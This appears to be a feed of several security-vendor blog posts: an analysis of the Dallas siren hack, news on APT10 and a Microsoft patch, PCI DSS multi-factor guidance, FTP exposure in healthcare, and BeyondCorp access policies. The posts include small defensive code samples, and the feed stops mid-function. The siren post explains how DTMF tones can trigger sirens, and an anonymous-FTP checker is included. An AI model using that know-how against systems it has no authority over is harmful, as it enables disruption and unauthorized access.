The emergency sirens were activated in Dallas County last Friday night at 11:42pm. This is not an unusual event in Dallas and the surrounding areas; in fact, it’s kind of a common occurrence during the springtime, when we get the most severe storms here in Texas (well, pretty much this entire region of the country). Colloquially known as the “tornado sirens”, they provide an early warning system in the event of a tornado warning being issued by the National Weather Service.

Additionally, they are activated whenever a storm is capable of producing straight-line winds in excess of 70 miles per hour or hail larger than one inch in diameter - basically any conditions that will endanger lives (usually limited to weather conditions). While intended to alert people who are outdoors to encourage them to move inside, they can be heard indoors fairly easily unless you are in the middle of listening to loud music, a VERY sound sleeper, or you live on the very outer edge of the nearest siren’s coverage area.

The Dallas County Emergency Operations Center (EOC), run by the Dallas Office of Emergency Management (OEM). Photo courtesy Dallas OEM.

However, in this case, the sky was clear and there was no storm in sight; in fact, there wasn’t even a storm remotely close to the Dallas area at all. First reported as a malfunction, it was later discovered to be a hack.

Here is what we know so far:

  • A physical location housing the computer or computers used to control the sirens’ behavior (the length and duration of a siren sound) was compromised.
  • The system was then activated, probably through the use of Dual-Tone Multi-Frequency (DTMF) signaling via radio.
  • All 156 sirens were activated, cycling through 15 rounds of 90-second activations; they were triggered approximately 60 times before they were shut down.
  • The sirens sounded repeatedly from 11:42pm until 1:17am.
  • The system was down until Monday afternoon at approximately 2:00pm for a total outage of roughly 52 hours.

There are a few things to explore around this, such as what technical details we can surmise about the hack and why someone might do it.

What Happened

One of the first things I did when I heard it was a hack was to search for information on siren systems. The usual setup involves a number of sirens which are triggered and controlled by a series of DTMF tones via radio, typically UHF around 450 MHz. Repeaters are used to allow a central location to send out the commands to the various sirens. This technology dates back decades. Newer systems allow programming of pre-determined siren sounds and their durations, and can be triggered from a central location. Some vendors of these systems allow for complete automation - if a National Weather Service alert comes in that would warrant the sirens going off, the sirens are activated automatically without human intervention.
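To make the DTMF layer concrete: each keypad symbol is encoded as a pair of simultaneous tones, one from a low-frequency “row” and one from a high-frequency “column”. The table below is the standard DTMF frequency assignment; the activation sequences a real siren controller listens for are vendor-specific, so the command string in the example is purely hypothetical:

```python
# Standard DTMF frequency pairs: (low/row Hz, high/column Hz) for each keypad symbol.
DTMF_FREQS = {
    "1": (697, 1209), "2": (697, 1336), "3": (697, 1477), "A": (697, 1633),
    "4": (770, 1209), "5": (770, 1336), "6": (770, 1477), "B": (770, 1633),
    "7": (852, 1209), "8": (852, 1336), "9": (852, 1477), "C": (852, 1633),
    "*": (941, 1209), "0": (941, 1336), "#": (941, 1477), "D": (941, 1633),
}

def tone_pairs(sequence):
    """Map a DTMF command sequence to the tone pairs a receiver would decode."""
    return [DTMF_FREQS[symbol] for symbol in sequence.upper()]

# Hypothetical activation string -- real siren codes are vendor- and site-specific.
print(tone_pairs("123#"))  # [(697, 1209), (697, 1336), (697, 1477), (941, 1477)]
```

Anyone with a transmitter on the right frequency can synthesize or replay these tone pairs, which is exactly why an unauthenticated DTMF trigger is such a fragile control mechanism.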

The Dallas County system is like most systems - it is a hybrid mix of old and new, and most vendors selling the new systems realize that the system they will be administering will be this odd mix. Additionally, due simply to the legacy nature of these systems, most sirens themselves are still air-gapped, so remote activation is usually done via a central system that uses the legacy radio and repeaters from decades ago to perform the DTMF triggering of the sirens.

Per the Dallas Office of Emergency Management (OEM), they could not turn off the system remotely or at Dallas OEM headquarters, and decided to turn off the entire radio system, including the repeaters (at multiple locations), to silence the sirens. Frighteningly, the Dallas city officials and Dallas OEM personnel that have the authority to activate and deactivate the sirens can do so not just from their desktop computer systems at work, but also via an app on their iPhones. Obviously this central control system is not air-gapped.

During a press conference, they stated that they had eliminated any of their “control systems” or “remote logins” as being used in the hack. They traced it down to one area where they believed the hack took place. Apparently it was put into a mode where it repeatedly triggered the sirens. The fix was to simply disconnect everything, and since they typically never take the system down, they had to follow a special series of steps to gracefully shut it down so they can get it back up again later.

So What Really Happened?

This obviously sounds like a central computer was accessed and settings were adjusted to not only make the sirens repeatedly go off, but to prevent Dallas OEM from being able to shut it off.

This implies two things - a computer was most likely accessed via a compromised password (or worse, a default or even no password), and an attacker-supplied password was set to prevent the attacker’s changes from being overwritten.

Dallas OEM also stated that it had not contacted the local police, but had contacted the FCC for help in determining where the hack came from. Since the FCC regulates communications via a number of mediums including radio, and Dallas OEM stated they shut down their radios and repeaters, this suggests that while one system was accessed to set up a mode of repeating siren activations, there was also some type of use of radio during the event as well.

The FCC may be able to use logs or other gathered data to help pinpoint where this illicit radio communication came from. For instance, if multiple devices are set up to receive radio transmissions, one could triangulate the position of the source by examining signal strength at each receiver. Even live experiments with a single receiver could give a rough idea of the source’s location - and, if they get lucky, it will be a parking lot that has security cameras aimed at it.
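The triangulation idea can be sketched numerically: if three receivers each turn a signal-strength reading into a distance estimate (via a path-loss model), the transmitter’s position falls out of simple geometry. Here is a toy 2D trilateration with made-up receiver coordinates - not how the FCC actually does it, just the underlying math:

```python
import math

def trilaterate(p1, p2, p3, d1, d2, d3):
    """Locate a 2D point from three receiver positions and distance estimates.

    Subtracting the circle equations pairwise yields two linear equations in
    (x, y), solved here with Cramer's rule.
    """
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = d1**2 - d2**2 + x2**2 - x1**2 + y2**2 - y1**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = d1**2 - d3**2 + x3**2 - x1**2 + y3**2 - y1**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("receivers are collinear; position is ambiguous")
    return ((c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det)

# Made-up receiver locations (km); the "transmitter" is at (3, 4).
receivers = [(0.0, 0.0), (10.0, 0.0), (0.0, 10.0)]
tx = (3.0, 4.0)
dists = [math.dist(tx, r) for r in receivers]
print(trilaterate(*receivers, *dists))  # -> approximately (3.0, 4.0)
```

In practice the distance estimates from signal strength are noisy, so real direction-finding uses many more measurements and a least-squares fit rather than an exact solve.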

The FCC does more than just radio, and it sounds like they are looking over all associated logs across all related systems, but since Dallas OEM shut down the radio system as well as the central computers, it does imply radio usage.

Who Did It?

This is where things get kind of interesting. Since this wasn’t something that could be done on the spur of the moment, it suggests some level of planning. It could have been just a goof hack done as a prank, maybe performed by some clever teen wearing a hoodie and getting their Mr. Robot on. However, a few things about this suggest it might be something else.

The timing was interesting: there was plenty of uneasiness in the US after last week’s response to the chemical attacks in Syria. While quite possibly a coincidence, a number of people responded to the sirens by going onto social media and openly speculating that we were under attack by Russia and WWIII had started. Already understaffed, Dallas’ E911 call center was flooded with calls, leading to call wait times of up to six minutes at the peak. And while Dallas OEM responded via social media telling people not to call 911, many people on Facebook were convinced that the local government was lying and that something bad was happening. Rumors started of similar sirens going off in other cities in Texas and Oklahoma (which turned out to be false).

So panic - or at least confusion - set in fairly quickly. Considering it happened at night and the sirens went off over and over, it seems that at bare minimum it was planned to irritate; but it doesn’t take much of a leap to realize that a system designed to warn people about danger is going to cause concern if it keeps going off.

The Siren Hacker Did Their Homework

While reading up on Outdoor Warning Siren (OWS) systems, I learned that many older models can only run for a limited amount of time before they overheat and need to recover before being activated again. The attacker apparently knew this as well: the pattern of the sirens being turned on and back off in cycles would prevent the overheating. I doubt all 156 sirens have been upgraded to modern models without this issue, so the attacker compensated, intending the sirens to not only go off and on repeatedly, but to do so over a long period of time. Toward that end, the attacker made adjustments to lock Dallas OEM out of their own system and maximize the length of the event.

So the attacker had some knowledge of how things were put together. Most of this knowledge could be gleaned from Google searches: you can download manuals for a lot of different sirens and systems, and most of the software being sold to control these systems can be downloaded for free (demo versions only), allowing for a crash course in OWS management. But a few things - the use of radios, knowing exactly what systems were in place and what radio frequencies might be involved - suggest a bit more planning. So I am thinking of three potential scenarios: a disgruntled insider; an attacker wanting to see at scale how a city would react and measure the results; or a clever movie plot device to distract us while George Clooney and Brad Pitt pull off some robbery.

The latter isn’t as insane as it might sound: on December 31st, 1982 in Tulsa, Oklahoma, a group of burglars used a chainsaw to cut through 50,000 phone lines in a very small room inside a telephone substation. This triggered hundreds of alarm systems at area businesses with police trying to respond, and in all the confusion, the burglars broke into a drug company warehouse and stole $1.3 million worth of narcotics (roughly $3.3 million in 2017 dollars). Yes, this actually happened; however, I kind of doubt it for our Dallas scenario. As a movie fan, of course I am hoping for some jewelry store robbery or museum art heist, but odds are it was either the insider theory or the “measure the results” theory. A disgruntled insider is a simple enough scenario, but the “measure the results” theory might warrant some thought.

Testing Real-Life Incident Response

One thing an attacker might want to do, particularly if they’re part of a terrorist group or a state-sponsored attack, would be to perform a “dry run” and see how a panic-inducing scenario might affect not just the local population, but measure response times and how other services (911, police, fire department, etc.) were impacted.

For example, it took a bit before 911 was overwhelmed and wait times became life-threatening for those with a real emergency. Knowing that could allow an attacker with a future plan to prepare accordingly. The same goes for the response on social media: a lot of people were more annoyed than anything else, but some were legitimately freaked out.

The attacker now knows a bit better how this scenario played out and might think of additional activities that could further induce panic. This doesn’t mean Dallas will necessarily be targeted again; another city might be targeted, with Dallas having been used as a testbed. We, of course, have no evidence of this scenario being the case, but it’s not outright impossible that this was the motivation.

So who do I think did it? My money is on a disgruntled insider. However I don’t want to dismiss the other scenarios outright, as there is a non-zero chance it is one of those.

Lessons Learned

With the pace of innovation and the advent of IoT moving into industrial control systems such as OWS, there are probably going to be more events like this.

I think the best lesson we can learn is one of planning for emergencies. What is the worst thing that could happen to your organization? Does your incident response and disaster planning cover all kinds of threats and all kinds of strange scenarios? Sitting down and having regular tabletop exercises with the entire incident response and disaster recovery team is important when preparing for the real thing. Throwing in some movie plot or spy ring scenarios is kind of fun, but these extreme scenarios will also show you some of the cracks in your response and recovery plans that ordinary or mundane scenarios might not. Those tabletop exercises should include everything you can think of, from minor to major. Will it affect money? Your customers’ private data? Be a PR nightmare? Is upper management at an off-site planning retreat on the ski slopes and unreachable when the unthinkable happens? Cover it all.

Dallas OEM said in the press conference and in press interviews that they had not planned for this at all. Remarkably, they did an excellent job of at least getting the sirens off, and now have a plan to get things back online with methods in place to prevent the hack from happening again. And even if they never catch who did this or learn why, it is still a valuable lesson for all of us.

Have a disaster plan, test it regularly, and don’t forget that George Clooney is just wandering around out there planning something awful. Be prepared!

<![CDATA[Hackers Target Managed Service Providers to Breach Client Networks]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/hackers-target-managed-service-providers-to-breach-client-networks https://duo.com/blog/hackers-target-managed-service-providers-to-breach-client-networks Industry News Wed, 05 Apr 2017 09:00:00 -0400

One of the largest sustained global cyber espionage campaigns, known as Operation Cloud Hopper, is targeting managed IT service providers (MSPs) in order to gain access to their customers' networks, according to a report by PricewaterhouseCoopers (PwC) and BAE Systems.

The threat actor group is known as APT10, said to be based in China. In operation since 2009, they’ve been known to steal a high volume of intellectual property and other sensitive data from MSP networks. More recently, the group has significantly increased the scale and scope of their campaigns to target many different industries, which can be attributed to the compromise of MSP networks and their large cache of diverse customers.

Leveraging Unfettered Cloud & Hosting Provider Access

Since MSPs are often responsible for remotely managing their customers' IT and user systems, they typically have direct, privileged access to their clients' networks. If they're cloud or hosting providers, they may also house a large amount of customer data - sometimes sensitive or confidential - on their own internal infrastructure, according to the PwC report. Targeting just one MSP can give an attacker access to a large number of different organizations.

According to the report, several MSPs have been breached, including those that provide enterprise services or cloud hosting. The industries targeted include retail, technology, energy, industrial manufacturing, engineering and construction, business and professional services, pharmaceuticals and the public sector.

There has also been a separate custom malware campaign targeting Japan-based organizations. APT10 has posed as different public sector entities like the Ministry of Foreign Affairs, the Liberal Democratic Party of Japan and others to gain access to commercial companies and government agencies.

Same Old Story: Phishing, Exploits and Stolen Credentials

Their main attack method is phishing emails sent with an executable attachment. To trick users, the hacking group has registered a number of spoofed domains mimicking religious and academic organizations, such as salvationarmy.org, to send emails from. Once a user clicks a link to download the attachment containing an exploit payload, the threat actor can leverage known vulnerabilities to gain access to the target's network.

According to the report, the hacking group used stolen MSP credentials to harvest further credentials with the help of credential theft tools like mimikatz, which targets Windows computers to steal password hashes and dump plaintext passwords, and can effectively evade antivirus software. Most of the stolen MSP credentials gave attackers administrator or domain administrator privileges. Additionally, the attackers relied on systems with shared access and credentials to hop easily between MSP networks and those of their clients.

Security Tips for MSPs

To protect their networks and their clients’ networks and data, MSPs should:

  • Never share credentials between different users. Create unique user accounts and credentials, and restrict access to the least amount required to do the job in order to reduce the scope of what an attacker can access if they manage to steal or compromise one account.
  • Use two-factor authentication to protect every account against remote unauthorized access, including both administrative accounts and accounts to systems that seem noncritical (attackers have been observed targeting low-profile systems to avoid detection).
  • Don’t rely on antivirus software alone to detect a breach. Consider taking more proactive security measures, like conducting internal phishing simulations in order to assess risk and educate users.
  • Invest in endpoint security. Get insight into your users’ devices and see who is authenticating into your network.
  • Protect against exploit kits leveraging known vulnerabilities. A good endpoint security solution gives you the ability to create policies that block access from risky devices attempting to authenticate to your network and systems.

Download The Essential Guide to Securing Remote Access to learn more about security concerns with third-party providers and cloud access.

<![CDATA[Microsoft Patch: Update to Fix Actively Exploited Vulnerabilities]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/microsoft-patch-update-to-fix-actively-exploited-vulnerabilities https://duo.com/blog/microsoft-patch-update-to-fix-actively-exploited-vulnerabilities Industry News Tue, 04 Apr 2017 09:00:00 -0400

Recently, Microsoft patched a vulnerability, known as CVE-2017-0022, that could be used in phishing attacks to direct users to malicious websites. It is one of three vulnerabilities that have been exploited by attackers in the wild since last year.

The security update is available in March’s Patch Tuesday, which included two months of updates and 18 security bulletins - 9 of which were rated as critical.

CVE-2017-0022 is a Microsoft XML Core Services information disclosure vulnerability: an attacker hosting a spoofed website could use it to test for the presence of files on a victim's disk. The attacker would have to convince a user to click a link in an email message that directs them to the malicious website.

According to Trend Micro, the vulnerability was used in the AdGholas malvertising campaign and packaged into the Neutrino exploit kit. In addition to using the vulnerability in phishing attacks and to access information on files found on the user’s system, the attacker could also detect if the system was using particular security software, such as malware analysis tools.

How does a user get exploited by this vulnerability? First, they visit a website using a web browser that serves up a malicious advertisement. The browser is then redirected to a malicious landing page that hosts the exploit kit. After checking the user’s system for security software, the kit launches its malware if the tools aren’t detected. To test your organization’s risk of getting phished, launch an internal phishing campaign.

Attackers will often target non-critical vulnerabilities (such as CVE-2017-0022, considered medium severity) as part of a strategic approach - software vendors often relegate these types of vulnerabilities to later fixes than the more critical, attention-grabbing ones. That means attackers have more time to exploit them, according to Trend Micro.

Other critical vulnerabilities patched in March by Microsoft affect the web browser, Internet Explorer (IE). The most severe could allow for remote code execution if a user visits a malicious website via IE, giving an attacker the same user rights as the user, according to the Microsoft Security Bulletin.

This is why it’s imperative for organizations to update their software regularly and on a timely basis to stay protected against the latest vulnerabilities that may be leveraged via phishing attempts. With Duo’s Device Insight, you can check every endpoint that logs into your company’s applications for out-of-date software. Plus, you can enforce device access policies that require the latest versions by either warning users if they need to update, or blocking them until they do, by using Duo’s Endpoint Remediation.

Duo Beyond gives you even more control and insight - differentiating between managed (corporate-owned) and unmanaged (employee-owned) devices accessing your services. To protect against unknown and potentially risky devices, you can leverage Trusted Endpoints to block access by unmanaged devices.

See the latest enterprise endpoint trends in Duo’s 2016 Trusted Access Report: Microsoft Edition.

<![CDATA[Navigating New PCI DSS 3.2 Guidelines for MFA With Duo]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/navigating-new-pci-dss-32-guidelines-for-mfa-with-duo https://duo.com/blog/navigating-new-pci-dss-32-guidelines-for-mfa-with-duo Industry News Mon, 03 Apr 2017 09:00:00 -0400

When you’re trying to parlay a multi-factor authentication (MFA) product into a solution that complies with current requirements and stays ahead of future ones, it’s hard to tell which way the ship is sailing — especially when you run up against parts that are more what you’d call guidelines than actual rules. PCI DSS 3.2 went into effect in October 2016, with requirement 8.3.1 (expanded use of MFA) coming into effect on February 1, 2018. In the meantime, the PCI Council has come out with an MFA Supplement that sets forth some guidelines that may be incorporated into the standard at some point in the future.

Now, Duo helps meet these guidelines, with features such as:

  • Policies to prevent authentication login from specific locations, networks or IP addresses
  • Strong authentication with Secure Element (SE) or U2F
  • An easy-to-use out-of-band authentication factor (Duo Push, based on asymmetric keys)

Your Compass: Complete Authentication Visibility

However, there’s one guideline in the supplement that we know from experience is likely to create problems for both the user and the support staff: “no prior knowledge of the success or failure of any factor should be provided to the individual until all factors have been presented.”

Remember that PCI requirements — and indeed, the whole standard — are designed to mitigate risk scenarios around credit card theft. In this case, one of the security threats PCI is addressing is an attacker trying to guess (or brute force) an account’s username and password. It’s a common tactic, and many security assessors and penetration testers disapprove of the notion of letting anyone know what they got wrong in a login sequence, just in case it’s an attacker.

But anyone who has staffed a help desk knows how frustrating it is for the user, who may not even be sure of the username, much less the password. The conventional assumption that a user always knows and remembers their username dates back to a time when everyone had only one or two accounts, usually just for work.

Today, by virtue of being business partners, reporting entities, and online consumers, people have literally hundreds of accounts, many of them predating password managers by a decade. Some of these accounts may not be used more than once a year, if that often. It’s completely normal for them to struggle with remembering usernames and passwords, particularly when those usernames were assigned in an enterprise context.

The practice of concealing details on which part of an authentication process failed is more commonly known in the industry as “security by obscurity.” And in this case, it’s not necessary, since there are other measures you can take to mitigate the risk of password guessing or brute forcing attempts. Most systems today enforce a lockout (either temporary or permanent) after a certain number of incorrect attempts; giving more feedback will help the user figure out what they’re doing wrong and help them stay within that limit.
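The lockout behavior described above is simple to sketch: track recent failures per account and lock the account once they exceed a threshold within a window. A minimal, in-memory illustration (thresholds are placeholders; a real deployment would persist state and tune these to its own risk estimates):

```python
import time
from collections import defaultdict

MAX_ATTEMPTS = 5           # failed attempts allowed within the window
WINDOW_SECONDS = 15 * 60   # how far back failures are counted
LOCKOUT_SECONDS = 30 * 60  # how long a triggered lockout lasts

_failures = defaultdict(list)  # username -> timestamps of recent failures
_locked_until = {}             # username -> time the lockout expires

def record_failure(username, now=None):
    """Record a failed login; trigger a temporary lockout at the threshold."""
    now = time.time() if now is None else now
    # Keep only failures that still fall inside the counting window.
    recent = [t for t in _failures[username] if now - t < WINDOW_SECONDS]
    recent.append(now)
    _failures[username] = recent
    if len(recent) >= MAX_ATTEMPTS:
        _locked_until[username] = now + LOCKOUT_SECONDS

def is_locked(username, now=None):
    """True while the account's lockout has not yet expired."""
    now = time.time() if now is None else now
    return _locked_until.get(username, 0) > now
```

Because the lockout is temporary and the feedback is explicit, a legitimate user who mistypes a password learns what happened and stays within the limit.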

Some retailers, who deal with account takeover (ATO) attacks on a regular basis, block attempts from known malicious addresses before they can even start rattling the doorknobs. Even if an attacker manages to use the right username and password, Duo’s push notification gives the details of the secondary request, allowing the original user to indicate that the request is fraudulent and deny it.

Don’t Conflate ‘Feedback’ With ‘Bypass’

The next part of this PCI guideline reads: “If an unauthorized user can deduce the validity of any individual authentication factor, the overall authentication process becomes a collection of subsequent, single-factor authentication steps, even if a different factor is used for each step.”

We don’t agree with this arbitrary division of a multi-factor authentication process into “steps” just because the user receives feedback on the primary authentication success or failure. That’s independent of the other possible risk: that the MFA process could be interrupted and the user could bypass the next factor in the sequence. Giving feedback and being bypassed are two different issues, and shouldn’t be conflated in the one guideline.

Usable, Strong and Informed Security

At Duo, we believe in providing strong security with usability. We provide several robust measures to mitigate brute-force attempts, in addition to other security risks such as man-in-the-middle attacks and phishing. Duo provides IT admins with detailed reports of all authentication attempts for logging and auditing purposes, as well as APIs to export that data into a SIEM or other system to monitor for anomalous activity (see, for example, our Splunk Connector).
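As a sketch of what monitoring exported authentication logs can look like, the snippet below counts denied attempts per account and flags heavy offenders; the "username" and "result" field names and the threshold are illustrative placeholders, not Duo's exact export schema:

```python
from collections import Counter

def flag_suspicious_accounts(events, threshold=10):
    """Count denied authentications per account and flag heavy offenders.

    `events` is an iterable of log entries as dicts; field names here
    are illustrative stand-ins for whatever your log export provides.
    """
    denied = Counter(
        e["username"] for e in events if e["result"] == "denied"
    )
    return {user: count for user, count in denied.items() if count >= threshold}
```

In practice you would feed this the entries your SIEM ingests and alert on anything it returns.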

The bottom line is that enterprises have to make tradeoffs every day between security and usability. They should be able to compare their own support costs of troubleshooting an MFA sequence, and in some cases potentially losing customers, against a risk scenario that they may already be able to mitigate with other controls.

What can organizations do to address these guidelines going forward?

  • As always, get your QSA’s (Qualified Security Assessor) view of the issues. Look at all your MFA process flows, particularly where you’re rolling out the technology for the first time. Your application security testing (such as for Requirement 6.5.8) should include checks to ensure that a successful primary authentication doesn’t allow the user to pivot and gain access before the secondary authentication takes place.
  • Make sure you have mitigating controls on your primary authentication to thwart password guessing and brute-force attempts, such as limits on the number of attempts within a short period of time. (Some account takeover attacks now spread out their attempts over days and different IP addresses, so monitoring is critical.)
  • If you have help desk statistics on calls from users who are having trouble authenticating, use those to estimate the overall support cost today, and how it might change if you had to remove or change feedback messages.
  • If you’re in a position to give feedback to the PCI Council, share your opinion!
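The "spread out over days and different IP addresses" pattern noted above is exactly what per-IP rate limits miss, which is why monitoring matters. One rough way to catch it is to aggregate failures per account over a long window and count distinct source addresses; the record fields and thresholds below are illustrative:

```python
from collections import defaultdict

def low_and_slow_candidates(attempts, window_days=7, min_failures=20, min_ips=5):
    """Flag accounts whose failures accumulate slowly across many source IPs.

    `attempts` holds records shaped like:
        {"user": "alice", "ip": "198.51.100.7", "day": 3, "ok": False}
    where "day" is a simple day offset; field names and thresholds are
    placeholders, not any particular product's schema.
    """
    if not attempts:
        return []
    latest = max(a["day"] for a in attempts)
    counts = defaultdict(int)
    sources = defaultdict(set)
    for a in attempts:
        if not a["ok"] and latest - a["day"] < window_days:
            counts[a["user"]] += 1
            sources[a["user"]].add(a["ip"])
    return sorted(
        user for user, n in counts.items()
        if n >= min_failures and len(sources[user]) >= min_ips
    )
```

An attacker making three guesses a day from rotating addresses never trips a per-IP limit, but shows up clearly in this per-account view.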

For more guidance, check out A Guide to Stronger Security in PCI DSS 3.2.

<![CDATA[Secure All the Things With Duo]]> ccherrie@duosecurity.com(Chrysta Cherrie) https://duo.com/blog/secure-all-the-things-with-duo https://duo.com/blog/secure-all-the-things-with-duo Press and Events Fri, 31 Mar 2017 16:00:00 -0400

Something we hear from Duo customers over and over again is, “Your app is so easy to use! I wish it could work for even more things in my life.”

The truth is*, now it can! We heard your feedback and are excited to announce new enhancements to Duo Push that support all the things. Securing your work applications with two-factor authentication is great, but it's just the beginning. With the one-tap ease of Duo Push, the possibilities for integration with your day-to-day life are only limited by your imagination, and the implications are staggering.

“Using 2FA for literally everything ever has proven to secure 100% of all the things.”
– Jordan Wright, Duo Labs Senior R&D Engineer

Some ideas to get you started:

  • Rev up your car alarm. Think the Club is the forefront of automotive security? Get with the times and lock down your car with 2FA, using your mobile phone like a key.
  • Protect your intellectual property. Tired of sticky-fingered folks getting their mitts on your Penguin Classics? Two factor sure beats a flimsy physical lock.
  • Revolutionize the restroom. Make your home even smarter, securing every appliance and gadget imaginable with the ease of a remote control.

To see how these fresh features for Duo Push can transform your life, watch our new video:


Best of all, when you enable 2FA for all the things, you activate peace of mind. With breaches affecting organizations and individuals more than ever, how sure are you really that no one is surveilling you through your microwave or accessing your files without your permission? To stop 100% of hackers, real or imagined, use two-factor authentication.

“According to the Verizon Data Breach Investigations Report, 63% of breaches involved stolen or weak credentials. You can eliminate the risk of account takeover — and enable everyday life — with the easiest two-factor authentication method: Duo Push.”
– Olabode Anise, Duo Labs R&D Engineer

Are you ready to secure all the things? Push for all the things is available in limited beta. Tweet at us at @duosec to learn more.

*Psych! You can do a lot with Duo Push, but we're just funnin' ahead of April Fool's Day.

<![CDATA[Attackers Actively Targeting Healthcare's FTP Servers]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/attackers-actively-targeting-healthcares-ftp-servers https://duo.com/blog/attackers-actively-targeting-healthcares-ftp-servers Industry News Thu, 30 Mar 2017 09:00:00 -0400

The FBI has issued a private industry notification to the healthcare industry, warning organizations that attackers are actively targeting FTP (File Transfer Protocol) servers to access protected health information.

These FTP servers are connected to medical and dental facilities, giving attackers access to regulated and sensitive protected healthcare data, according to the FBI. Criminals could also configure FTP servers to allow for write access, giving them a tool to store or launch malicious attacks.

FTP allows for basic, unencrypted and anonymous public file transfers, using cleartext passwords for authentication, according to SSH.com. While the legacy protocol has been superseded by SFTP and SSH, organizations often forget these implementations: they were deployed years ago but never disabled or replaced with a more secure protocol.

The FBI cited 2015 research from the University of Michigan that found over one million FTP servers configured to allow anonymous access to the data stored on them. Last September, Softpedia reported that nearly 800,000 FTP servers reachable via an IPv4 address were accessible without the need for any credentials.
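Checking whether a server you operate allows anonymous access takes only a few lines with Python's standard ftplib, which attempts an anonymous login by default. The connection factory below is injectable purely so the check can be exercised without a live server, and you should of course only scan hosts you are authorized to test:

```python
from ftplib import FTP, error_perm

def allows_anonymous(host, timeout=5, make_conn=FTP):
    """Return True if `host` accepts an anonymous FTP login.

    `make_conn` defaults to a real ftplib connection; it is injectable
    so the logic can be tested offline.
    """
    try:
        conn = make_conn(host, timeout=timeout)
        conn.login()       # ftplib logs in as "anonymous" by default
        conn.quit()
        return True
    except error_perm:     # server refused the anonymous login
        return False
    except OSError:        # unreachable host, timeout, refused connection
        return False
```

Running a check like this across your own address space is a quick way to find the forgotten legacy servers the FBI notification warns about.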

Exposing databases of private patient information can lead to HIPAA violations which come with hefty government fines and data breach costs.

At this year’s RSA Conference, it was reported that the estimated annual cost of data breaches affecting the healthcare industry has topped $6 billion, with an average cost of $2.1 million to resolve a breach, based on a Ponemon Institute study on healthcare data privacy and security.

In the talk about electronic healthcare record (EHR) security, a diagram about where EHRs are vulnerable highlighted external and legacy systems connected to EHR data centers as likely attack vectors, for good reason.

EHR Vulnerabilities Diagram

Any legacy software can introduce a point of weakness for healthcare organizations. In the 2016 Duo Trusted Access Report, we found that the healthcare industry is even more behind than other industries on average when it comes to updating their Windows operating systems. Only 14% of Windows endpoints in healthcare were running the latest version, Windows 10.

We also found that the healthcare industry had twice as many endpoints running Windows XP as other industries on average - a 16-year-old version of the OS that no longer receives security updates.

Updating legacy software can sometimes be difficult, if not impossible, due to application dependencies and interconnected medical devices. However, the costs and impact of a data breach can be far greater than those associated with updating, patching and replacing old systems with more secure ones.

<![CDATA[BeyondCorp: Creating Access Policies]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/beyondcorp-creating-access-policies https://duo.com/blog/beyondcorp-creating-access-policies Industry News Wed, 29 Mar 2017 09:00:00 -0400

In our first blog post introducing the BeyondCorp concept, we discussed what organizations should think about when trying it for themselves, and outlined the general steps, which may not happen in sequential order.

In this post, we’ll talk about creating access policies. Your access proxy takes on the role of enforcing access to corporate resources, regardless of whether they’re outside or inside your traditional perimeter. Enforcement strategy is one way we express risk tolerance; rightsizing those policies depends on factors such as sensitivity, threat, user community, regulatory requirements, and any number of other things. And enforcing policies consistently for both sides of the firewall is a key tenet of the BeyondCorp model.

More Than A Multipass

Your access policies are much more flexible than a stop-or-go approach. Like a multi-use tool, you can use them to bludgeon, nudge, slice, or tap. Here are some of the types of access policies to consider.

  • Warning - strongly recommending or requiring action at some point in the future.
  • Blocking - the heaviest of the policies, preventing access entirely.
  • Logging - taking note of a condition or event.
  • Mitigating - loosening or reversing the effects of another policy based on certain risk scenarios.
  • Responding - taking short-term actions to react to a particular situation.


Warning

You can use warning policies to drive behavior. A warning is a reminder with a little weight behind it: if you don’t do what the reminder says, sooner or later you will suffer a consequence. For example, most organizations put a grace period in their policies to give users time to update their software before they’re either forcibly upgraded, or they’re blocked until they catch up.

Using Duo Beyond as an example of the BeyondCorp model, a simple policy that results in a warning might look like this:

Access Policy to Warn Users

So if a new version of a particular browser comes out, your users have one month to upgrade to it, or be blocked after that grace period has expired.

If your warning policy has no consequence attached to it — that is, the user may override or ignore the warning every time — then it’s little more than an irritating flag that pops up in the middle of that user’s workflow. And if the warning is about something that the user can’t take action on, it’s even more frustrating. If a system can’t be updated because of some other dependency, then the warning serves no purpose and just trains the user to ignore the irritant. When it comes to access policies, make sure that you’re asking for a concrete action that’s within the recipient’s capability, and be prepared to take an enforcement action within a reasonable time period based on your risk estimates.
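The warn-then-block flow described above boils down to comparing the installed version against the latest one and checking whether the grace period has run out. A simplified sketch, with made-up version tuples and a 30-day default standing in for whatever your risk estimates dictate:

```python
from datetime import date, timedelta

def browser_policy(installed, latest, latest_released, today, grace_days=30):
    """Outcome of a warn-then-block policy for browser versions.

    Versions are compared as tuples, e.g. (57, 0); the names, version
    scheme, and 30-day default are illustrative only.
    """
    if installed >= latest:
        return "allow"
    if today <= latest_released + timedelta(days=grace_days):
        return "warn"   # out of date, but the grace period is still running
    return "block"      # grace period expired without an upgrade
```

The key property is that the warning carries a concrete deadline, so the user knows the consequence is coming and what action avoids it.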


Blocking

A policy for blocking is best suited to situations where you don’t have wiggle room. For example, Duo customers such as KAYAK want to block access to critical applications from non-managed personal devices. Either the device is corporate-owned and “blessed,” or it isn’t. In Duo Beyond, the policy looks like this:

Trusted Endpoints by Duo Security

Many organizations are interested in blocking based on geolocation. If you are quite sure that you never need to allow access from certain regions, a general block will work, but that’s not always an option if you do business with them or you have users who travel there. Bear in mind that blocking based on IP address or a derived geolocation won’t necessarily protect you from a determined attacker who can spoof those things, but in general, it can work as a filtering mechanism for large segments of the population who should not even be trying to authenticate to your applications.
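As a rough illustration of that filtering mechanism, here is what a source-address check might look like using Python's standard ipaddress module. The networks listed are reserved documentation ranges standing in for whatever regions you deny; a real access proxy would typically resolve a region from a GeoIP database, but the shape of the check is the same:

```python
import ipaddress

# Reserved documentation ranges standing in for whatever regions or
# networks your policy denies.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

def is_blocked(source_ip):
    """Coarse allow/deny on the source address.

    Addresses can be spoofed or proxied, so treat this as a broad
    filter, not a guarantee.
    """
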